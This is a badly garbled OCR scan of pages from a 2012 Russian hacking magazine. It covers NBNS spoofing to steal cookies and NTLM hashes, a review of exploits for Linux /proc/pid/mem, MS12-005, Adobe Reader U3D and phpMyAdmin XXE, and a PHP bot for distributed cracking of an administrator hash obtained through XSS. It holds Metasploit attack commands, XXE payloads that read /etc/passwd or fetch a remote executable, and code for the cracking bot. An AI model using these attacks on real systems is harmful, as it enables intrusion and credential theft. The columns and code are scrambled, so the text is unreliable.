Теперь нам необходимо подделать ответ на NBNS-зanpoc. Для этого нужен Tгansaction

10

можем подменить какой-либо рандомный запрос. Но нам нужны

из NBNS - зanpoca . Но , как уже было

сказано выше, этот запрос чаще всего является широковещатель­

кукисы именно с ХХХ.сот, а потому мы проворачиваем неболь­

ным, а так как мы находимся в той же локалке , то никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

с его получением нет. К нашей радости, для спуфинга в

скрытый фрейм !можно заюзать JavaScгipt) , а уже в зто м фрейме

MSF уже

nрисутствует соответствующий модуль. Вот краткая схема дей­

загружаем ХХХ.сот. Однако нам надо не просто загрузить ХХХ .

ствий:

сот, но еще и сделать так, чтобы браузер не нашел его с помощью

1.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

2. 3.

4.

DNS

и начал использовать для поиска только

NBNS.

Очень важно ,

чтобы браузер продолжал считать просп уф ленный домен тем же

nbns/nbns_response. Выставляем регэпс ответов на запросы :

Set REGEX *google*. set spoofip xa.kep.

сам ым доменом, иначе в силу вступят кросс-доменные политики

и никаких кукисо в мы не увидим. Так как указанная методика

Указываем, какой IР-адрес подставлять:

IP.add r ess.

разресерчивалась как раз во время написания этого текста, то

Зanycкaeм: run.

единственным достойным вариантом стало обращение к н есуще­

Теперь сделаю небольшее отступление. Создатель этого моду­

Теперь м о ж но вывести общ и й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал использовать его совершенно для други х lgoo.gi/Jz2Q9), а именно для банального сбора NТLМ-хешей.

1. 2.

Поднимаем wеЬ-сервер с легированием входящих запросов

!чтобы соби рать кукисы) и фреймом, ссылающимся на несуще­

Е сли точнее, то после запуска вышеуказанного модуля от браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит множество запросов, п ричем чаще всего получается

спуфить короткие имена ! типа тakaka), а не длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются к зоне интранет !не интернетl). А эта зона в IE считается « до­

Устанавли ваем NВNS-сп уфи нг на все имена.

3.

Жертва, которая ввела что-то в адресную строку браузера, спу­ фится по

4.

NBNS и

спуфится по

веренной», и в ней действуют гораздо менее грозные настройки безопасности. К примеру, здесь разрешена автоматическая аутен­ тификация на сайтах. Таким образом, мы можем запустить модуль

5.

редиректится на хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, опять же,

NBNS.

Браузер о тправляет кукисы ХХХ.сот на asdasdasd . XXX.coт, то есть на хостхаке ра.

для сбора N Т LМ-хешей по Н Т Т Р !хотя можно и по

1.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, мы можем получить кукисы от множества сайтов. Ед инст венн ое ограничение здесь в том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, где будет производить ся запрос:

быть установле ны не на ко нкретный узел IХХХ . сот), а на домен

Порт, где поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно я столкнулся с не возможностью пропускать трафик

настройки

через прокси при системных обращениях к

прокси на

-127.0 .0.1. Почему

localhost

системных? Потому, что настройки

щиеся прокси , используются большинством ПО в мер,

Python

или к л у пбзку

IE, касаю­ Windows. Напри­

при использовании uгll i b2 автоматом берет прокси

г

IE и .NET fгатеwогk запрещаюттрафику идти через localhost и 127.0.0.1 . В IE9 эту проблему удалось решить

за счет того , что в настройках можно выбрать опцию << не исполь­ зовать прокси>>-

<<-localhost».

Решение , в общем-то, чрезвычайно простое. Во - первых, можно

ОС . Надо отметить, что острее всего п роблема проявляется,

обращаться к сервису по любому

IP

когда сервис поднят именно на внутреннем интерфейсе 1127.0.0.1) и недоступен на внешнем 10.0.0.0). В тот раз мне удалось решить

например по адресу

как все они относятся к одному

ее каким-то обходным путем , но недавно я наткнулся на инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое имя для lo calhost : 127.0.0.1 localhOst .

ресный пост в благе Eldaг Maгcussen. Он написал, что дефолтные

ХАКЕР

03/158/2012

г

127.1.2.3, так

в

127

подсети, кроме первого,

интерфейсу. Во-вторых , можно nрописать в файле локального

055


Павел Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Дмитрий Михайлович

[115612, де р. К рас н ая звездо ч ка, д . 1[

Обзор эксплоитов В этом интереснейшем обзоре мы рассматри­ ваем свежую уязвимость в ядрах

Linux,

позво­

ляющую без особого труда поднять привилегии

1

Локальное повышение привипегий в Linux

CVSSV2

6.8

1111111 111 1 111 11111

11 11 1 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана с интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, который Linux предоставляет

Microsoft Office и Acrobat Reader, а также ХХЕ-инъекцию в phpMyAdmin.

для прямой запи с и в память процесса и чтения из нее. В ядре версии

Не пропусти!

до с тат о чно защищен от неавторизованного доступа с помощью

в системе, баги в

2.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

запись в память процесса, поскольку сочли, что этот интерфейс уже других ме х анизмов ядра. На самом деле nисать в память процесса мож е т любой пользователь, обладающий достаточными правами.

Как оказалось, эти права проверяютсЯ не совсем корректно. В итоге пол у чило с ыо , чтополучилось:вовсехверсияхядра,начинаяс

2.6. 39, зло у мышл е нник может продвинуть по « карьерной лестнице» до рута любого имеющего с я пользователя .

056

ХАКЕР

03/158/20 12


Обзор экс пло итов

цt:J4!·Jii

int match; rcu_read_lock(); match = (ptrace_parent(task) == current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m вы полня ется такой ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data = ( void*)(( long)current->self_exec_id); file- >f_mode 1= FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , на открытие нет никаких ограни ч е н ий - любой может это сде лать. Одн ако н а за пись и чтение некоторые ограничения вс ё­ таки уста н овлены. Обратимся к коду функции, которая осущест вля­

ет запис ь lприведена тол ьк о н аиболее важная часть функции):

Чтобы за пи сь пр ошла успешно, ее должен осуществлять либо сам

п роцесс ltask == сuггепtl, либо родитель , трассирующий этот про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс через рtгасе . Ра зличные трюки с рtгасе не увенчались успехом,

позтому рассмотрим вариант с task

== сuггепt. Чт о если процесс сам

за пишет н уж ные нам данны е себе в память? Очевидно, что н ас в п ер­

вую очередь интересуют процессы с атрибутом

! * ... *! struct task_struct * task = get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm = check_mem_permission(task); copied = PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Ра ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что н а stdeгг выдается с тро ка, соз данная с нашим

участием. Казалось бы, мы можем о ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) найти нужное место в памяти , с помощью dup211 связать стандартный поток ошибок и файловый дескриптор откры­

*/ i f ( file- >privat e_data != ( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, записать нужные данные, а за т ем исполнить шелл-код . Однако не всё так просто. Здесь выполняется вторая про­ верка , в ходе которой текущее значение

self_exec _ id с равнива ется

со значением, с пом о щью которого был соз дан файловый де скри п ­

1* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся две проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission и

каждом запуске пр о ц есса, поэтому мы не можем п олучи тьд оступ к

self_exec_id. Функция check_mem_pe гmission является простой обер т кой для __ check_

Тем не менее, эту проверку можно обойти : с помощью foгkll мы созда­

памяти вышеизложенным способом.

mem_peгmission, вот ч т о она делает:

ем потомка и вн у три него с помощью execll с т артуем новый процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда мы за п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр о ц есс имеет значе ни е

self_exec_id , равное ее

вается на еди ниц у. В нашем пото мке мы открываем па мя ть пр е д ка и

создаем файловый д ескриптор для /pгoc/<P ID пр е д ка>/mе m , благо

struct mm_st ruct *mm;

на о т крытие нет провер ок. В предке т ем временем за п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm = get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

с помощью, как выразился сам соз да те ль экс плоита , <<о чень черной

магии со кетов юн икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор от п отомка и возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, по какому адресу делать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

должен затруднить нашу за д а ч у, однако взгляни на это:

$ readelf -h / bin /s u 1 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам как бы нам екает, что программа

su использует с татич е­

ский а др ес сек ции .text !в ином случае был бы тип DYN, а не Е Х ЕС) . Это означает, что

su в большинстве дистрибутивов скомпи лиров ана Pl Е , с ледовательно, ASLR для секции .text ра бо­

без использования

тать не будет, что у проща ет написание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен на exgloit-db .com , EDB-10 18411 . Пр име р е г о использования представлен на ск р и нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 32-

и 64-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 2012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

2

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых для запуска встроенного

·

СliсkОnсе-приложения с полными правами доступа IFull Tгustl. В результатевыполнения описанных выше действий на экране

~3

CVSSV2

111111 111 111 11 11 1

появится ряд диалоговых окон. Однако пользователю не нужно

111 11

ничего с ними делать .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, когда

PoweгPoint работает в ре ж и м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится в полноэкранном режиме, после выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит восстановление фокуса. После запус~а

удаленной системесправами текущего пользователя. Для этого

СliсkОnсе-приложения мы можем посылать сообщения диалоговым

пользователь уязвимой системы должен зайти на специально сфор­

окнам, чтобы закрыть их.

мированную wеЬ-страницу или открыть злонамеренный файл

Office.

Уязвимость присутствует в механизме безопасности

lj:JЦ!•Jii

Дело в том, что

Уязвимость, описанная в

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему файл такого типа можно внедрить в документ Office. Когда пользователь уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает два аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли файл испол­

ный файл автоматически выполняется . Напомню, что

няемым, сопоставляя расширения файлов с элементами таблицы

ClickOnce- это

!для удобства назовем ее ехесЕхtТаЫе).

технология развертывания, позволяющая создавать самообновляе­ мые приложения

Windows,

которые могутустанавливаться и запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 1 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться при минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: с веб-страницы,

общего сетевого ресурса или носителя, например ком па кт-диска . Его можно установить на компьютер конечного пользователя и запустить локально, даже если компьютер не подключен к сети, или запустить

в оперативном режиме, без установки каких-либо компонентов на

компьютер конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий и автоматически заменяя все обновленные файлы. Для реализации атаки в данном случае используем специальным

образом сформированный файл презентации PoweгPoint. Эта про­

грамма позволяет назначить Custom Animation'ы для ОLЕ-пакетов . В отличие от обычных анимаций, мы можем задатьдве специфичные

для OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) и Edit Package [редактировать пакет). При Activate Contents выполняются те же действия, что и при двойном щелчке пользователя по встроенному объекту. Таким

образом,

Custom Animation'ы позволяют выполнять указанные по-

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

от

: ответ

от ОТ

от

с

lb.wo~dp~e ss .com

72.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 32

& а ~т = 32 &а~т = 32 &а~т = 32 &а~ т =32

В ре 1·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 72.233.69.6: Пакетов: отnравлено = 4, nолучено Приблизительное время nриема - nереnачи

4,

1

1

Минимальное

=2 40t·1C =166t1c =168t·1C =166t1C

в

а

&а~т:

ТТL = 127 ТТL = 127 ТТL = 127 ТТL = 127

nот е ряно

= 0 (0%

nотерь),

мс :

= 166мсек, Максимальное = 240 м с ек, Ср е nне е = 185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 192 .168. 0. 2: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

1***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

72.233.2.58, 72.233.69.6, 76.74.254.120 76.74.254.123, 74.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- запущенный

058

Python- скри пт

ХАКЕР

03/1 58/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 1В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем в цикле этутаблицу и смотрим, имеет ли встроенный файл такое же расширение, как и элементтаблицы. Д ля этого используется функция l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит в том, что в таблице приведена лишь часть существующих расширений для исполняемых файлов. В качестве примера можно взять ру или

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно с но е с одер ж и м о е 3D -о б ъекта в т е ле рdl - ф ай ла

А- имя , под которым должна быть активирована аннотация . РО- аннотация должна активироваться, как только открывает­ ся страница, содержащая аннотацию на 3 D -данные.

lj:JЦ!e]ii Последовательностьзапу с ка объектов :

2. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, только если файл является исполняемым. Н о рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она вновь проходит по табли ц е

Объект 4 - действие OpenAction инициирует обращение к JavaScript. Объект 14-JavaScгipt ссылается на объект 15. Объект 15- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, если расширение встроенного файла не содержится

затем переходит на вторую страницу.

в ехесЕхtТаЫе, никаких предупреждений не выдается.

Объект 11-определение 3D-данных и описание их форматирова­

Пропатченный

ния.

Объект 1О - 3D-данные, которые будут показываться !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 2008 SP2, Windows 7.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 1О -ссылается на именованные словари I/3D, /U3DI. Объект 11- ссылается на именованные словари I/3DI, /3DD, / 3D,

Существует обновление, устраняющее эту уязвимость.

/ 3DAI.

3

Уязвимость в Adobe UЗD-данных

Reader при обработке

CVSSV2

10.0

11111 11 11 111 11 111111

111 1 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

1ШIШ

Уязвимость вызвана ошибкой при обработке U 3D-данных. Такая ошибка может привести к сбою. П ри ус п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м установить полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная на библиотеке

Кратко опишем U3D-компоненты, чтобы лучше пони мать, какие из них используетсплоит:

Объект 15 - содержит JаvаSсгiрt-коддля реализации heap spraying и перенаправления на вторую страницу !инициирует

процесс отображения 3D-данных ! . Сплоит реализован в Metasploit lпример с полезной нагрузкой в виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload => windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd => calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- на текущий момент единственный п оддерживаемый под­ тип и 3D - объект.

F I L ENAМE

3DD lнеобходимl - определяе т поток или словарь с 3D-данными,

OBFUSCATE

3DA lнеобязателенl - словарьактивации, определяющий время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

когда следует показывать 3D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

3D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая основной режим использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее состояние 3D-данных придеактивации.

ХАКЕР ОЗ/ 1 5 8/ 2 01 2

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию через JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 9.4.0 / 9.4.5 / 9.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, который ссылается на файл /et€/

i'·'.J1Jfi

passwd, и nри обработкедокумента его содержимое включается

Adobe Read eг 9.4.0 19.4.5 19.4.6 под Windows ХР SP3.

в него. Кстати говоря, в ХМL-документ можно не только включать

локальные и удаленные файлы.

,_i,J!Iiii•J:I

В нем можно запускать исполняемые файлы, если парсеру раз­

решено это делать . По стандарту это выглядит nримерно так :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version= "1.0 " encoding= "utf-8" ?> < ! DОСТУРЕ foo

LFI в phpMyAdmin через ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

5.0

111111 111 111 111 11111

111 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 1

[DШ В начале года исследователь Магсо Batista опубликовал весьма интереснуюуяз вимо с тьтипа Loca l File lncluding. Эксnлуатируется

она нетривиально, через ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой разновидность ХМ L-инъекции .

Напомню , что nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе с п омо щью программы ShowGif.exe обрабатыва­

запроса к веб-серверу] можно изменить содержимое ХМL­

ется рисунок baг.gif. В некоторых случаях мы можем внедрить nо­

документа. Обычно интерес представляютфайлы базы данных

добную конструкцию через ХМ L-и нъекцию и выполнить требуемый

xmiOB, гд е содержится информация о пользователя х:

код. Более подробная ин фа об ХМ L-инъекциях есть на сайте OWASP

[goo.gi/BBG9C ]. c?xm l version= "l . e" encoding= "IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> gandalf@middleearth.com< /mail> </user>

lj:J4!•Jij В phpMyAdmin имеется функция имnорта базы данны х из заданного пользователем ХМ L-фа йла. Уязвимос ть заключается в том, что по­ сле загрузки специально сформированного ХМL-документа атаку­

ющий получает возможность [ограниченную nравами веб - сервера] прочит ать nрои зво льный файл в системе или локальной сети.

Уязвимос ть на хо дится в файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается без проверки на су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки на внешний примитив:

$xml = simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin для предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], прежде чем за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала модуль к Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 500 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

1.

Логинится в phpMyAdmin с помощью предоставленных реквизи­ тов.

2.

СоздаетХМL-документ, применяя ХХЕ-инъекции для заданного файла.

Смышленый читатель без труда nроведет аналогию с SQLинъекциями, а я тем временем nерейду непосредственно к инъек­

3. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный файл с серве ра.

циям подтипа ХХЕ . В док ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются в начале док уме нта в об­

Возможные оnции эксnлоита и nример успешной эксплуатации по ­

ласти ОТО. Существует несколько видов при м итивов, но сейчас нас

казаны на скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если в определении примитива присутствует URI, то он называет с я внешним. Соответ­ ственно, парсер должен получитьдоступ к этому URI и включить его со держимое в документ, если это было задано, например, так:

c?xml version= "1.0" encoding= "utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 3.4.х

вnлоть до 3.4.7. 1 и 3.3.х вплоть до 3.3. 10.5.

f'·'••••t·'a

Обновиться минимум до вер сии phpMyAdmin 3.4.7. 1 [3 .3.1 0.5] или

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012



взлом

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи для брута

Кто-то выбрал для себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал предпочтение

от Античата;

ш~ один из консольных

брутеров;

www.l2ko.de кoнвepтep батников.

не самому экзотическому

языку- РНР. А всё потому, что мне чаще приходится

На нашем диске ты сможешь найти

работать с вебом, чем

все необходимые

с десктопом. Но бывают и такие

файлы и исходники, описанные в статье.

моменты, когда тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. во время очередных ковыряний очередной

XSS,

ко мне

в лаги попал хеш па рол я администратора нужного мне ресурса. Ко­ нечно же, его необходимо было расшифровать, и я сразу обратился к различным онлайн-сервисам, помогающим с расшифровкой. Ни один из них мне не помог. С этой душевной печалью я отправился на ха к-форумы, где

в специальных разделах оставил просьбу о помощи в расшифров­ ке. Но и там меня ожидал фейл. Однако сайтик был весь из себя расчудесный, и бросать его админку мне совсем не хотелось. Заварив очередную кружку кофе, я начал думать, как поступить. Брутить на своей машине не получилось бы- процессор слабоват. Значит, нужно было где-то взять компьютер с хорошими характе­

ристиками, и желательно не один. Покупать себе домой

20

новых

мощных серваков ради расшифровки одного хеша как-то не входи­ ло в мои планы. Поэтому я купил несколько выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И вот тут я решил углубиться

062

ХАКЕР

03/158/2012


РНР-бот для

Windows

Комnилим бот

в процесс. А n о чему бы не написать бота, пр и н им ающего команду

function mySettings()

на расшифровку хеш а с общего сервера? М ож н о б ыло и написать,

{

только вот проблема заключалась в том, что я з н ал только скрипто­

$settings = file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings != '' )

вые языки, а с десктопом никогда не имел де л а . И тут в моей памя­ ти всплыла такая вещь, как всевозм о жные р hр 2 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 1' , $settings, 2 ); $config = array ( 'status' => $status, 'data' => $statusdata); return $config;

Бота я решил заставить действовать по вполне определенному плану. Итак , существует сервер, на к о торый добавляются << За­ дания » . Боты отстукивают на него каждые пять минут, проверяя, не появилось ли для них новое задание.

И если появилось, посылают серверу сигнал о том, что б рут

начался. Сервер, в свою очередь , добавляет в базу запись о том,

else return false;

кто работает, а кто- нет. После завершения Брута бот отправляе т серверу запрос с уведомлением, что работа окончена. Этот запрос

также может содержать расшифровку. При этом нужно сделать так, Эта ф у н к ция обращается к нашему гейту, ловит ответ, и, если

чтобы боты использовали разные словари для брутфор са , так как брутить один и тот же словарь много раз просто не имеет смысла. Также следует учесть, что хеш ей может быть много, поэтому мы

он не п у ст ой , делит его на две части там, где есть символ

1.

Первая

часть представляет собой команду для бота, а вторая- допол­

не станем гонять весь словарь через брутфорс для каждого из них.

нительные данные для этой команды. Теперь напишем функцию

В процессе б рута мы будем сразу же сверять результаты со все-

брутфорса на основе заданных в виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь всего несколько функций и выступит, так сказать, в качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> уже сам брутфорсер. Именно

{

поэтому нам нужно выбрать такой брутфорсер, который работает

/1 Сохраняем хеыи для брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

через консоль, так как далее мы переведем скрипт вехе, который тоже работает в консольной среде. Я использовал наработку моего знакомого- она имеет такой синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь первый параметр-это название файла с хешами для

брутфорса [один хеш= одна строка), второй параметр-название

// Говорим серверу, что мы уже работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а последний параметр-название файла, в который брутер будет записывать результаты . Задачи серве­ ра- правильно установить бота, периодически чистить рабочую

Сохраняем резу

$uploader

ьтат

на

сервере

no

Ф

r

= ftp_connect( 'ftp://adres.master.servera.com' );

папку, а также подавать сигналы о том, что пора бы уже начать б рут по таким-то хешам. Для начала напишем функцию обращения к серверу для получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т о Ехе Converter v1. 5

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

что мы закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, функция берет в качестве аргумента массив с хе шами

ЕлаурЬоn

и сохраняет его в удобоваримом для брутера формате, то есть

0Et><тn>tlheor<I!J'10'

·-l

в виде текстового файла, в каждой строке которого находится один хеш. Затем бот стучит на сервер с сигналом о том, что начал

работать. Это нужно для того, чтобы сер вер не записывал бота в <<мерт вые >> машины, если он не будет отстукивать каждые пять

0 Addv.sta _ _ _

минут !тайм-аут по умолчанию), и помнил , что бот функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему созданный файл хе ш ей,

Oo..r.nte-Res

установленный словарь и файл для сохранения результатов . Соз­

P.w~ter:

даем также функцию <<ус тановки >> бота. Установка представляет собой скачивание и последующее сохранение словаря, по которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

11

Exit

11

Компилим батник дпя скрытного запуска брутера

{

$vocabulary = file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

и снова запускаем шедулер. Нужно учесть, что файл словаря не­

обходим уже при первом обращении к серверу, поэтому сделаем предохранитель, который подготавли вает словар ь и запускает шедулер :

Серверный с крипт, к которому обращается бот, должен воз­

